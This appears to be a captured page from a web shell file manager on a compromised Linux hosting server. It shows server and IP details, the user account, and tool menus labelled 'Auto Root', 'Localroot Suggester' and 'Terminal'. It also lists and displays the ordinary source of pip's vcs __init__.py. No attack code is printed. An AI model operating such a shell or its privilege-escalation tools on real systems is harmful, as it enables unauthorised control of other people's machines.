Linux 162-55-97-189.cprapid.com 5.14.0-687.24.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jul 9 18:14:06 EDT 2026 x86_64
LiteSpeed
Server IP : 162.55.97.189 & Your IP : 216.73.216.182
Domains :
Cant Read [ /etc/named.conf ]
User : kavci
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
lib /
python3.9 /
site-packages /
pip /
_internal /
vcs /
Delete
Unzip
Name
Size
Permission
Date
Action
__pycache__
[ DIR ]
drwxr-xr-x
2026-07-09 10:16
__init__.py
596
B
-rw-r--r--
2026-05-23 08:59
bazaar.py
2.79
KB
-rw-r--r--
2026-05-23 08:59
git.py
17.39
KB
-rw-r--r--
2026-05-23 08:59
mercurial.py
4.83
KB
-rw-r--r--
2026-05-23 08:59
subversion.py
11.32
KB
-rw-r--r--
2026-05-23 08:59
versioncontrol.py
21.89
KB
-rw-r--r--
2026-05-23 08:59
Save
Rename
# Expose a limited set of classes and functions so callers outside of # the vcs package don't need to import deeper than `pip._internal.vcs`. # (The test directory may still need to import from a vcs sub-package.) # Import all vcs modules to register each VCS in the VcsSupport object. import pip._internal.vcs.bazaar import pip._internal.vcs.git import pip._internal.vcs.mercurial import pip._internal.vcs.subversion # noqa: F401 from pip._internal.vcs.versioncontrol import ( # noqa: F401 RemoteNotFoundError, RemoteNotValidError, is_url, make_vcs_requirement_url, vcs, )